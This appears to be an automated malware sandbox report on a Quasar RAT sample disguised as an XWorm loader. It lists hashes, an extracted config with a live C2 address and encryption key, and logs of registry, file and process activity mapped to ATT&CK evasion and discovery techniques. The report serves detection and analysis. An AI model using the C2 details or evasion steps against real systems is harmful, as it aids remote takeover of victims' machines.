quasar | 61bad8d96f17bc5e303a42e6fb63aa90dacec97a90aa2bf7bfebdee5d7f969eb

Analysis

max time kernel
510s
max time network
513s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
04-12-2024 09:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Obekräftade 432398.zip
Size

38.2MB
MD5

43ec213ae2f483ad0571615217a015f5
SHA1

3249d4183d62599ee7352261af8c9f9fbfc41cab
SHA256

61bad8d96f17bc5e303a42e6fb63aa90dacec97a90aa2bf7bfebdee5d7f969eb
SHA512

e590d60c4ea504816c611f0417d72622fec2e8a496da2b61e31911e6bed82f5765501907e806b35dd4b28d7c759d9b8294cb462a84997bb8e984a7acd866350f
SSDEEP

786432:jyIjkDNnx2+2NYTb4opWJ2E0R53QVnGajZAS/VNEEgrWpngLHYdXyXJW:TkDNnxV2iTb4mVE0RpsgUNBC+oSO8

Score

10^/10

quasar v3.0.0 | slave agilenet defense_evasion discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v3.0.0 | Slave

147.185.221.17:25792

Mutex

92d55a7d-fa9d-4687-a639-1c17ad82e127

Attributes

encryption_key
AAADD171AFB4583A86B8E61A97433E10C4015A71
install_name
.exe
log_directory
$sxr-Logs
reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/2352-2060-0x00000249E1690000-0x00000249E1E8A000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3312	powershell.exe
2368	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\Control Panel\International\Geo\Nation	XWormLoader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\Control Panel\International\Geo\Nation	XWormLoader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\Control Panel\International\Geo\Nation	$sxr-mshta.exe

Executes dropped EXE 11 IoCs

pid	Process
444	XWorm V5.0.exe
2132	XWormLoader.exe
2480	XWormLoader.exe
1688	XWormLoader.exe
2604	XWormLoader.exe
1116	XWorm V5.0.exe
1312	$sxr-mshta.exe
4956	$sxr-cmd.exe
2352	$sxr-powershell.exe
4592	$sxr-cmd.exe
4488	$sxr-powershell.exe

Impair Defenses: Safe Mode Boot 1 TTPs 64 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\cht4vbd	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\tcpipreg	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SCardSvr\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TokenBroker\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\QWAVE	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TPM	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\rdyboost	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UmRdpService	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DisplayEnhancementService\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\gupdatem	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RDPUDD\ = "Service"	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DmEnrollmentSvc	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\BDESVC	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AssignedAccessManagerSvc	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hidserv\ = "Service"	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\clr_optimization_v2.0.50727_64	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\BcastDVRUserService_24f25\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\USBSTOR\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\BthA2dp\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TsUsbFlt\ = "Service"	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\BasicDisplay	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TimeBrokerSvc	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TSDDD\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WdFilter\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MsBridge	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AppvVfs	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\autotimesvc	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CNG	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\drmkaud	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RTL8023x64	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vwififlt	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CDPUserSvc_24f25\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vmgid\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Mup\ = "Service"	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\BthA2dp	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\GoogleChromeElevationService\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WdNisSvc	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Themes\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\volume\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{9DA2B80F-F89F-4A49-A5C2-511B085B9E8A}	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\mountmgr\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MsQuic\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NlaSvc\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\scmbus	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vwifibus	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DeviceAssociationBrokerSvc_24f25	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Ahcache.sys	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MSKSSRV	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Eaphost\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\msisadrv\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\nvdimm	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\EntAppSvc	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\mouclass	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasMan	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\embeddedmode	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SystemEventsBroker	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\COMSysApp	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TapiSrv\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UGatherer\ = "Service"	powershell.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\gupdate	powershell.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\nvstor	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PrintNotify\ = "Service"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\acpitime\ = "Service"	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
444	XWorm V5.0.exe
1116	XWorm V5.0.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/files/0x002a0000000450c5-970.dat	agile_net
behavioral1/memory/444-982-0x0000029B29D80000-0x0000029B2A7F2000-memory.dmp	agile_net

Hide Artifacts: Hidden Window 1 TTPs 3 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
4592	$sxr-cmd.exe
4488	$sxr-powershell.exe
2352	$sxr-powershell.exe

Drops file in System32 directory 28 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfc00C.dat	lodctr.exe
File created	C:\Windows\system32\perfc010.dat	lodctr.exe
File created	C:\Windows\system32\perfc007.dat	lodctr.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File created	C:\Windows\system32\perfc009.dat	lodctr.exe
File created	C:\Windows\system32\perfh009.dat	lodctr.exe
File created	C:\Windows\system32\perfc010.dat	lodctr.exe
File created	C:\Windows\system32\perfh007.dat	lodctr.exe
File created	C:\Windows\system32\perfh010.dat	lodctr.exe
File created	C:\Windows\system32\perfc011.dat	lodctr.exe
File created	C:\Windows\system32\perfh007.dat	lodctr.exe
File created	C:\Windows\system32\perfh00A.dat	lodctr.exe
File created	C:\Windows\system32\perfh009.dat	lodctr.exe
File created	C:\Windows\system32\perfh011.dat	lodctr.exe
File created	C:\Windows\system32\perfc00A.dat	lodctr.exe
File created	C:\Windows\system32\perfc011.dat	lodctr.exe
File created	C:\Windows\system32\perfc007.dat	lodctr.exe
File created	C:\Windows\system32\perfh010.dat	lodctr.exe
File created	C:\Windows\system32\perfh011.dat	lodctr.exe
File created	C:\Windows\system32\perfh00A.dat	lodctr.exe
File created	C:\Windows\system32\perfh00C.dat	lodctr.exe
File created	C:\Windows\system32\perfc00C.dat	lodctr.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\perfc00A.dat	lodctr.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File created	C:\Windows\system32\perfc009.dat	lodctr.exe
File created	C:\Windows\system32\perfh00C.dat	lodctr.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-cmd.exe	powershell.exe
File created	C:\Windows\$sxr-mshta.exe	powershell.exe
File created	C:\Windows\$sxr-cmd.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	powershell.exe
File created	C:\Windows\$sxr-powershell.exe	powershell.exe
File created	C:\Windows\$sxr-mshta.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	powershell.exe
File created	C:\Windows\$sxr-powershell.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	powershell.exe
File opened for modification	C:\Windows\$sxr-cmd.exe	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4548	2480	WerFault.exe	99
2008	2604	WerFault.exe	106

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWormLoader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWormLoader.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733306173"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={760E46B1-DD0A-4584-A778-E6C230C25422}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 04 Dec 2024 09:56:15 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	$sxr-mshta.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
3312	powershell.exe
3312	powershell.exe
2368	powershell.exe
2368	powershell.exe
32	7zFM.exe
32	7zFM.exe
3312	powershell.exe
3312	powershell.exe
3312	powershell.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe
2368	powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
4488	$sxr-powershell.exe
4488	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
2352	$sxr-powershell.exe
4488	$sxr-powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
32	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	32	7zFM.exe
Token: 35	32	7zFM.exe
Token: SeSecurityPrivilege	32	7zFM.exe
Token: SeSecurityPrivilege	32	7zFM.exe
Token: SeSecurityPrivilege	32	7zFM.exe
Token: SeDebugPrivilege	444	XWorm V5.0.exe
Token: SeSecurityPrivilege	32	7zFM.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeSecurityPrivilege	32	7zFM.exe
Token: SeDebugPrivilege	1116	XWorm V5.0.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	3312	powershell.exe
Token: SeSecurityPrivilege	32	7zFM.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	2352	$sxr-powershell.exe
Token: SeDebugPrivilege	2352	$sxr-powershell.exe
Token: SeDebugPrivilege	2352	$sxr-powershell.exe
Token: SeDebugPrivilege	4488	$sxr-powershell.exe
Token: SeShutdownPrivilege	3572	Explorer.EXE
Token: SeCreatePagefilePrivilege	3572	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2288	svchost.exe
Token: SeIncreaseQuotaPrivilege	2288	svchost.exe
Token: SeSecurityPrivilege	2288	svchost.exe
Token: SeTakeOwnershipPrivilege	2288	svchost.exe
Token: SeLoadDriverPrivilege	2288	svchost.exe
Token: SeSystemtimePrivilege	2288	svchost.exe
Token: SeBackupPrivilege	2288	svchost.exe
Token: SeRestorePrivilege	2288	svchost.exe
Token: SeShutdownPrivilege	2288	svchost.exe
Token: SeSystemEnvironmentPrivilege	2288	svchost.exe
Token: SeUndockPrivilege	2288	svchost.exe
Token: SeManageVolumePrivilege	2288	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2288	svchost.exe
Token: SeIncreaseQuotaPrivilege	2288	svchost.exe
Token: SeSecurityPrivilege	2288	svchost.exe
Token: SeTakeOwnershipPrivilege	2288	svchost.exe
Token: SeLoadDriverPrivilege	2288	svchost.exe
Token: SeSystemtimePrivilege	2288	svchost.exe
Token: SeBackupPrivilege	2288	svchost.exe
Token: SeRestorePrivilege	2288	svchost.exe
Token: SeShutdownPrivilege	2288	svchost.exe
Token: SeSystemEnvironmentPrivilege	2288	svchost.exe
Token: SeUndockPrivilege	2288	svchost.exe
Token: SeManageVolumePrivilege	2288	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2288	svchost.exe
Token: SeIncreaseQuotaPrivilege	2288	svchost.exe
Token: SeSecurityPrivilege	2288	svchost.exe
Token: SeTakeOwnershipPrivilege	2288	svchost.exe
Token: SeLoadDriverPrivilege	2288	svchost.exe
Token: SeSystemtimePrivilege	2288	svchost.exe
Token: SeBackupPrivilege	2288	svchost.exe
Token: SeRestorePrivilege	2288	svchost.exe
Token: SeShutdownPrivilege	2288	svchost.exe
Token: SeSystemEnvironmentPrivilege	2288	svchost.exe
Token: SeUndockPrivilege	2288	svchost.exe
Token: SeManageVolumePrivilege	2288	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2288	svchost.exe
Token: SeIncreaseQuotaPrivilege	2288	svchost.exe
Token: SeSecurityPrivilege	2288	svchost.exe
Token: SeTakeOwnershipPrivilege	2288	svchost.exe
Token: SeLoadDriverPrivilege	2288	svchost.exe
Token: SeSystemtimePrivilege	2288	svchost.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe
32	7zFM.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2352	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 32 wrote to memory of 4984	32	7zFM.exe	89
PID 32 wrote to memory of 4984	32	7zFM.exe	89
PID 4984 wrote to memory of 1680	4984	cmd.exe	92
PID 4984 wrote to memory of 1680	4984	cmd.exe	92
PID 32 wrote to memory of 444	32	7zFM.exe	94
PID 32 wrote to memory of 444	32	7zFM.exe	94
PID 32 wrote to memory of 2132	32	7zFM.exe	95
PID 32 wrote to memory of 2132	32	7zFM.exe	95
PID 2132 wrote to memory of 2480	2132	XWormLoader.exe	99
PID 2132 wrote to memory of 2480	2132	XWormLoader.exe	99
PID 2132 wrote to memory of 2480	2132	XWormLoader.exe	99
PID 32 wrote to memory of 1688	32	7zFM.exe	100
PID 32 wrote to memory of 1688	32	7zFM.exe	100
PID 2132 wrote to memory of 4696	2132	XWormLoader.exe	102
PID 2132 wrote to memory of 4696	2132	XWormLoader.exe	102
PID 1688 wrote to memory of 2604	1688	XWormLoader.exe	106
PID 1688 wrote to memory of 2604	1688	XWormLoader.exe	106
PID 1688 wrote to memory of 2604	1688	XWormLoader.exe	106
PID 1688 wrote to memory of 5000	1688	XWormLoader.exe	110
PID 1688 wrote to memory of 5000	1688	XWormLoader.exe	110
PID 4696 wrote to memory of 2304	4696	cmd.exe	112
PID 4696 wrote to memory of 2304	4696	cmd.exe	112
PID 4696 wrote to memory of 3312	4696	cmd.exe	113
PID 4696 wrote to memory of 3312	4696	cmd.exe	113
PID 5000 wrote to memory of 3160	5000	cmd.exe	114
PID 5000 wrote to memory of 3160	5000	cmd.exe	114
PID 5000 wrote to memory of 2368	5000	cmd.exe	115
PID 5000 wrote to memory of 2368	5000	cmd.exe	115
PID 32 wrote to memory of 1116	32	7zFM.exe	116
PID 32 wrote to memory of 1116	32	7zFM.exe	116
PID 1312 wrote to memory of 4956	1312	$sxr-mshta.exe	124
PID 1312 wrote to memory of 4956	1312	$sxr-mshta.exe	124
PID 4956 wrote to memory of 4072	4956	$sxr-cmd.exe	126
PID 4956 wrote to memory of 4072	4956	$sxr-cmd.exe	126
PID 4956 wrote to memory of 2352	4956	$sxr-cmd.exe	127
PID 4956 wrote to memory of 2352	4956	$sxr-cmd.exe	127
PID 3696 wrote to memory of 1940	3696	cmd.exe	128
PID 3696 wrote to memory of 1940	3696	cmd.exe	128
PID 2352 wrote to memory of 632	2352	$sxr-powershell.exe	5
PID 2352 wrote to memory of 684	2352	$sxr-powershell.exe	7
PID 2352 wrote to memory of 964	2352	$sxr-powershell.exe	12
PID 2352 wrote to memory of 344	2352	$sxr-powershell.exe	13
PID 2352 wrote to memory of 472	2352	$sxr-powershell.exe	14
PID 2352 wrote to memory of 456	2352	$sxr-powershell.exe	15
PID 2352 wrote to memory of 884	2352	$sxr-powershell.exe	16
PID 2352 wrote to memory of 596	2352	$sxr-powershell.exe	17
PID 2352 wrote to memory of 1108	2352	$sxr-powershell.exe	18
PID 2352 wrote to memory of 1168	2352	$sxr-powershell.exe	20
PID 2352 wrote to memory of 1244	2352	$sxr-powershell.exe	21
PID 2352 wrote to memory of 1300	2352	$sxr-powershell.exe	22
PID 2352 wrote to memory of 1320	2352	$sxr-powershell.exe	23
PID 2352 wrote to memory of 1352	2352	$sxr-powershell.exe	24
PID 2352 wrote to memory of 1392	2352	$sxr-powershell.exe	25
PID 2352 wrote to memory of 1508	2352	$sxr-powershell.exe	26
PID 2352 wrote to memory of 1520	2352	$sxr-powershell.exe	27
PID 2352 wrote to memory of 1532	2352	$sxr-powershell.exe	28
PID 2352 wrote to memory of 1616	2352	$sxr-powershell.exe	29
PID 2352 wrote to memory of 1660	2352	$sxr-powershell.exe	30
PID 2352 wrote to memory of 1772	2352	$sxr-powershell.exe	31
PID 2352 wrote to memory of 1804	2352	$sxr-powershell.exe	32
PID 2352 wrote to memory of 1964	2352	$sxr-powershell.exe	33
PID 2352 wrote to memory of 1972	2352	$sxr-powershell.exe	34
PID 2352 wrote to memory of 1984	2352	$sxr-powershell.exe	35
PID 2352 wrote to memory of 1132	2352	$sxr-powershell.exe	36

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
